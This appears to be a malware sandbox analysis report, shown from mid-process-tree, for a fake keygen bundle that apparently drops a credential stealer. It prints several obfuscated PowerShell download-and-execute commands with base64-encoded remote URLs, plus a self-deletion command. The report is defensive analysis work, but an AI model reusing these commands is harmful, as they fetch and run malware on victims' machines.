                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL omdrklgfia $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;omdrklgfia yvshnex $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|yvshnex;omdrklgfia gemjhbnrwydsof $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKdg==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);gemjhbnrwydsof $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                  4⤵
                  • Blocklisted process makes network request
                  • Loads dropped DLL
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:928
                  • C:\Users\Public\irx.exe
                    "C:\Users\Public\irx.exe"
                    5⤵
                    • Executes dropped EXE
                    • Suspicious use of SetThreadContext
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2960
                    • C:\Windows\SysWOW64\WScript.exe
                      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Rarujmxnv.vbs"
                      6⤵
                      • Loads dropped DLL
                      PID:1160
                      • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                        "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                        7⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Suspicious use of SetThreadContext
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2704
                        • C:\Windows\SysWOW64\WScript.exe
                          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Coctuoidu.vbs"
                          8⤵
                          • Loads dropped DLL
                          PID:752
                          • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                            "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                            9⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Suspicious use of SetThreadContext
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2300
                            • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                              "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                              10⤵
                              • Executes dropped EXE
                              PID:1980
                        • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                          "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                          8⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Checks processor information in registry
                          PID:1924
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\System32\cmd.exe" /c taskkill /pid 1924 & erase C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe & RD /S /Q C:\\ProgramData\\829741949310284\\* & exit
                            9⤵
                              PID:2988
                              • C:\Windows\SysWOW64\taskkill.exe
                                taskkill /pid 1924
                                10⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:964
                      • C:\Users\Public\irx.exe
                        "C:\Users\Public\irx.exe"
                        6⤵
                        • Executes dropped EXE
                        PID:1908
                      • C:\Users\Public\irx.exe
                        "C:\Users\Public\irx.exe"
                        6⤵
                        • Executes dropped EXE
                        PID:1844
                      • C:\Users\Public\irx.exe
                        "C:\Users\Public\irx.exe"
                        6⤵
                        • Executes dropped EXE
                        PID:2220
                • C:\Windows\SysWOW64\mshta.exe
                  "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\2E03.tmp\b1.hta"
                  3⤵
                  • Modifies Internet Explorer settings
                  • Suspicious use of WriteProcessMemory
                  PID:1100
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL ftdrmoulpbhgsc $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;ftdrmoulpbhgsc rfmngajuyepx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|rfmngajuyepx;ftdrmoulpbhgsc hnjmzobgr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3Bkc2hjanZudi51Zy96eGN2Yi5leGU=';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);hnjmzobgr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                    4⤵
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1340
                • C:\Windows\SysWOW64\timeout.exe
                  timeout 2
                  3⤵
                  • Delays execution with timeout.exe
                  PID:668
                • C:\Windows\SysWOW64\mshta.exe
                  "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\2E03.tmp\ba.hta"
                  3⤵
                  • Modifies Internet Explorer settings
                  • Suspicious use of WriteProcessMemory
                  PID:1452
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL vfudzcotabjeq $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;vfudzcotabjeq urdjneqmx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|urdjneqmx;vfudzcotabjeq wuirkcyfmgjql $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKRA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);wuirkcyfmgjql $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                    4⤵
                    • Blocklisted process makes network request
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1832
                    • C:\Users\Public\irx.exe
                      "C:\Users\Public\irx.exe"
                      5⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:3040
                      • C:\Users\Public\irx.exe
                        "C:\Users\Public\irx.exe"
                        6⤵
                        • Executes dropped EXE
                        PID:2948
                      • C:\Users\Public\irx.exe
                        "C:\Users\Public\irx.exe"
                        6⤵
                        • Executes dropped EXE
                        PID:1572
                      • C:\Users\Public\irx.exe
                        "C:\Users\Public\irx.exe"
                        6⤵
                        • Executes dropped EXE
                        PID:3008
                      • C:\Users\Public\irx.exe
                        "C:\Users\Public\irx.exe"
                        6⤵
                        • Executes dropped EXE
                        PID:812
                      • C:\Users\Public\irx.exe
                        "C:\Users\Public\irx.exe"
                        6⤵
                        • Executes dropped EXE
                        PID:2292
                • C:\Windows\SysWOW64\mshta.exe
                  "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\2E03.tmp\ba1.hta"
                  3⤵
                  • Modifies Internet Explorer settings
                  • Suspicious use of WriteProcessMemory
                  PID:1460
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL wvroy $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;wvroy bwskyfgqtipu $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bwskyfgqtipu;wvroy shlevpgb $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3JiY3h2bmIudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);shlevpgb $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                    4⤵
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1920

            Network

            MITRE ATT&CK Matrix ATT&CK v6

            Persistence

            Modify Existing Service

            1
            T1031

            Defense Evasion

            Modify Registry

            4
            T1112

            Disabling Security Tools

            2
            T1089

            Install Root Certificate

            1
            T1130

            Credential Access

            Credentials in Files

            3
            T1081

            Discovery

            Query Registry

            2
            T1012

            System Information Discovery

            2
            T1082

            Collection

            Data from Local System

            3
            T1005

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_03cd160f-91c2-46cf-9ad5-b4e22b5e2d99
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_231c2208-0720-4eec-b9f1-8bba11abd9fa
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_235184f8-dcca-4459-ace7-181c154dff79
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_235184f8-dcca-4459-ace7-181c154dff79
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_235184f8-dcca-4459-ace7-181c154dff79
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_235184f8-dcca-4459-ace7-181c154dff79
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_235184f8-dcca-4459-ace7-181c154dff79
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_235184f8-dcca-4459-ace7-181c154dff79
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_41d2d6f0-7c3b-4ef9-be08-0b3d1ffab725
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_57c6647c-75fc-47bb-8ce4-3b8f0921c533
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_69100e1c-3c4c-49c4-a1dc-aa133f8c3106
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_6d5fa298-996f-4fc9-9c01-b2226cbdaeba
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_7d6878ec-2a8b-418c-8f2b-b6fcd4b50cf8
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_96abbc07-5186-4bce-8ced-4c1a746f6a79
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b5be1599-641c-4d4e-8c82-2b13a84e50fc
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_de4eedb8-4762-4c56-b80c-203df3aa6fa8
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e43ce3f6-b60d-4b70-bed1-86e53bf07360
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_f7aa546a-518b-4c6d-b04f-3254e1a44423
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_fabbb9cf-9b8c-4b2f-b33d-0de7a9a3a10e
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
            • C:\Users\Admin\AppData\Local\Temp\210wKdeNEi.exe
            • C:\Users\Admin\AppData\Local\Temp\210wKdeNEi.exe
            • C:\Users\Admin\AppData\Local\Temp\2E03.tmp\Keygen.exe
            • C:\Users\Admin\AppData\Local\Temp\2E03.tmp\Keygen.exe
            • C:\Users\Admin\AppData\Local\Temp\2E03.tmp\b.hta
            • C:\Users\Admin\AppData\Local\Temp\2E03.tmp\b1.hta
            • C:\Users\Admin\AppData\Local\Temp\2E03.tmp\ba.hta
            • C:\Users\Admin\AppData\Local\Temp\2E03.tmp\ba1.hta
            • C:\Users\Admin\AppData\Local\Temp\2E03.tmp\m.hta
            • C:\Users\Admin\AppData\Local\Temp\2E03.tmp\m1.hta
            • C:\Users\Admin\AppData\Local\Temp\2E03.tmp\start.bat
            • C:\Users\Admin\AppData\Local\Temp\Caxi8CEgm0.exe
              MD5

              013db621a3351e3fb049efd2ccad79ff

              SHA1

              a23394ea54dbc5342a77938a2c285ee616185560

              SHA256

              df1bda6183201e4dc1bc6f6425361a565413e71f09da0648b0c82b39786af27a

              SHA512

              1bf6d076677b234c9da7cbc720fc64632b587b4223b5370a7ca3d53c4d59fa59ef117957b1646c92ba80dac332f6c1c313060d35de7236b2585e5bed00d79229

            • C:\Users\Admin\AppData\Local\Temp\Coctuoidu.vbs
            • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
            • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
            • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
            • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
            • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
            • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
            • C:\Users\Admin\AppData\Local\Temp\Rarujmxnv.vbs
            • C:\Users\Admin\AppData\Local\Temp\Tz4hYS6554.exe
            • C:\Users\Admin\AppData\Local\Temp\Tz4hYS6554.exe
            • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
            • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
            • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
            • C:\Users\Admin\AppData\Local\Temp\foYJbC9HQr.exe
            • C:\Users\Admin\AppData\Local\Temp\foYJbC9HQr.exe
            • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
            • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
            • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
            • C:\Users\Public\irx.exe
            • C:\Users\Public\irx.exe
            • C:\Users\Public\irx.exe
            • C:\Users\Public\irx.exe
            • C:\Users\Public\irx.exe
            • C:\Users\Public\irx.exe
            • C:\Users\Public\irx.exe
            • C:\Users\Public\irx.exe
            • C:\Users\Public\irx.exe
            • C:\Users\Public\irx.exe
            • C:\Users\Public\irx.exe
            • C:\Users\Public\qoc.exe
            • C:\Users\Public\qoc.exe
            • C:\Users\Public\qoc.exe
            • C:\Windows\temp\vs4jecqg.inf
            • \ProgramData\mozglue.dll
            • \ProgramData\mozglue.dll
            • \ProgramData\msvcp140.dll
            • \ProgramData\msvcp140.dll
            • \ProgramData\nss3.dll
              MD5

              bfac4e3c5908856ba17d41edcd455a51

              SHA1

              8eec7e888767aa9e4cca8ff246eb2aacb9170428

              SHA256

              e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

              SHA512

              2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

            • \ProgramData\nss3.dll
              MD5

              bfac4e3c5908856ba17d41edcd455a51

              SHA1

              8eec7e888767aa9e4cca8ff246eb2aacb9170428

              SHA256

              e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

              SHA512

              2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

            • \ProgramData\sqlite3.dll
            • \ProgramData\sqlite3.dll
            • \ProgramData\vcruntime140.dll
            • \ProgramData\vcruntime140.dll
            • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\freebl3.dll
            • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\freebl3.dll
            • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\mozglue.dll
            • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\msvcp140.dll
            • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\nss3.dll
              MD5

              02cc7b8ee30056d5912de54f1bdfc219

              SHA1

              a6923da95705fb81e368ae48f93d28522ef552fb

              SHA256

              1989526553fd1e1e49b0fea8036822ca062d3d39c4cab4a37846173d0f1753d5

              SHA512

              0d5dfcf4fb19b27246fa799e339d67cd1b494427783f379267fb2d10d615ffb734711bab2c515062c078f990a44a36f2d15859b1dacd4143dcc35b5c0cee0ef5

            • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\softokn3.dll
            • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\vcruntime140.dll
            • \Users\Admin\AppData\LocalLow\sqlite3.dll
            • \Users\Admin\AppData\Local\Temp\210wKdeNEi.exe
            • \Users\Admin\AppData\Local\Temp\2E03.tmp\Keygen.exe
            • \Users\Admin\AppData\Local\Temp\Caxi8CEgm0.exe
              MD5

              013db621a3351e3fb049efd2ccad79ff

              SHA1

              a23394ea54dbc5342a77938a2c285ee616185560

              SHA256

              df1bda6183201e4dc1bc6f6425361a565413e71f09da0648b0c82b39786af27a

              SHA512

              1bf6d076677b234c9da7cbc720fc64632b587b4223b5370a7ca3d53c4d59fa59ef117957b1646c92ba80dac332f6c1c313060d35de7236b2585e5bed00d79229

            • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
            • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
            • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
            • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
            • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
            • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
            • \Users\Admin\AppData\Local\Temp\Tz4hYS6554.exe
            • \Users\Admin\AppData\Local\Temp\axcsdfa.exe
            • \Users\Admin\AppData\Local\Temp\axcsdfa.exe
            • \Users\Admin\AppData\Local\Temp\foYJbC9HQr.exe
            • \Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
            • \Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
            • \Users\Public\irx.exe
            • \Users\Public\qoc.exe
            • \Users\Public\qoc.exe
            • memory/600-309-0x0000000000450000-0x0000000000461000-memory.dmp
              Filesize

              68KB

            • memory/600-312-0x0000000004C30000-0x0000000004C32000-memory.dmp
              Filesize

              8KB

            • memory/600-313-0x0000000001EF0000-0x0000000001F01000-memory.dmp
              Filesize

              68KB

            • memory/600-297-0x0000000000000000-mapping.dmp
            • memory/600-305-0x0000000000400000-0x0000000000401000-memory.dmp
              Filesize

              4KB

            • memory/600-303-0x0000000000380000-0x0000000000381000-memory.dmp
              Filesize

              4KB

            • memory/600-301-0x0000000073030000-0x000000007371E000-memory.dmp
              Filesize

              6.9MB

            • memory/600-311-0x00000000004A0000-0x00000000004A3000-memory.dmp
              Filesize

              12KB

            • memory/668-21-0x0000000000000000-mapping.dmp
            • memory/752-254-0x0000000002720000-0x0000000002724000-memory.dmp
              Filesize

              16KB

            • memory/752-242-0x0000000000000000-mapping.dmp
            • memory/928-44-0x0000000004C20000-0x0000000004C21000-memory.dmp
              Filesize

              4KB

            • memory/928-22-0x0000000000000000-mapping.dmp
            • memory/928-34-0x0000000071590000-0x0000000071C7E000-memory.dmp
              Filesize

              6.9MB

            • memory/928-140-0x00000000065D0000-0x00000000065D1000-memory.dmp
              Filesize

              4KB

            • memory/964-265-0x0000000000000000-mapping.dmp
            • memory/1036-342-0x0000000002F80000-0x0000000002FCC000-memory.dmp
              Filesize

              304KB

            • memory/1036-289-0x0000000000000000-mapping.dmp
            • memory/1100-18-0x0000000000000000-mapping.dmp
            • memory/1160-224-0x0000000002860000-0x0000000002864000-memory.dmp
              Filesize

              16KB

            • memory/1160-207-0x0000000000000000-mapping.dmp
            • memory/1340-37-0x0000000071590000-0x0000000071C7E000-memory.dmp
              Filesize

              6.9MB

            • memory/1340-24-0x0000000000000000-mapping.dmp
            • memory/1372-0-0x0000000000000000-mapping.dmp
            • memory/1452-27-0x0000000000000000-mapping.dmp
            • memory/1460-29-0x0000000000000000-mapping.dmp
            • memory/1628-20-0x0000000071590000-0x0000000071C7E000-memory.dmp
              Filesize

              6.9MB

            • memory/1628-181-0x0000000006840000-0x0000000006841000-memory.dmp
              Filesize

              4KB

            • memory/1628-12-0x0000000000000000-mapping.dmp
            • memory/1628-180-0x0000000006830000-0x0000000006831000-memory.dmp
              Filesize

              4KB

            • memory/1628-160-0x0000000006640000-0x0000000006641000-memory.dmp
              Filesize

              4KB

            • memory/1628-165-0x0000000006720000-0x0000000006721000-memory.dmp
              Filesize

              4KB

            • memory/1776-11-0x0000000000000000-mapping.dmp
            • memory/1788-10-0x0000000000000000-mapping.dmp
            • memory/1816-5-0x0000000000000000-mapping.dmp
            • memory/1816-4-0x0000000000000000-mapping.dmp
            • memory/1832-38-0x0000000002500000-0x0000000002501000-memory.dmp
              Filesize

              4KB

            • memory/1832-35-0x0000000071590000-0x0000000071C7E000-memory.dmp
              Filesize

              6.9MB

            • memory/1832-30-0x0000000000000000-mapping.dmp
            • memory/1832-50-0x0000000002800000-0x0000000002801000-memory.dmp
              Filesize

              4KB

            • memory/1832-151-0x0000000006750000-0x0000000006751000-memory.dmp
              Filesize

              4KB

            • memory/1864-8-0x0000000000000000-mapping.dmp
            • memory/1920-31-0x0000000000000000-mapping.dmp
            • memory/1920-36-0x0000000071590000-0x0000000071C7E000-memory.dmp
              Filesize

              6.9MB

            • memory/1920-202-0x00000000064E0000-0x00000000064E1000-memory.dmp
              Filesize

              4KB

            • memory/1920-203-0x00000000065B0000-0x00000000065B1000-memory.dmp
              Filesize

              4KB

            • memory/1924-250-0x0000000000400000-0x0000000000434000-memory.dmp
              Filesize

              208KB

            • memory/1924-247-0x0000000000417A8B-mapping.dmp
            • memory/1924-246-0x0000000000400000-0x0000000000434000-memory.dmp
              Filesize

              208KB

            • memory/1948-19-0x0000000071590000-0x0000000071C7E000-memory.dmp
              Filesize

              6.9MB

            • memory/1948-84-0x0000000006410000-0x0000000006411000-memory.dmp
              Filesize

              4KB

            • memory/1948-70-0x0000000006250000-0x0000000006251000-memory.dmp
              Filesize

              4KB

            • memory/1948-13-0x0000000000000000-mapping.dmp
            • memory/1948-56-0x0000000005340000-0x0000000005341000-memory.dmp
              Filesize

              4KB

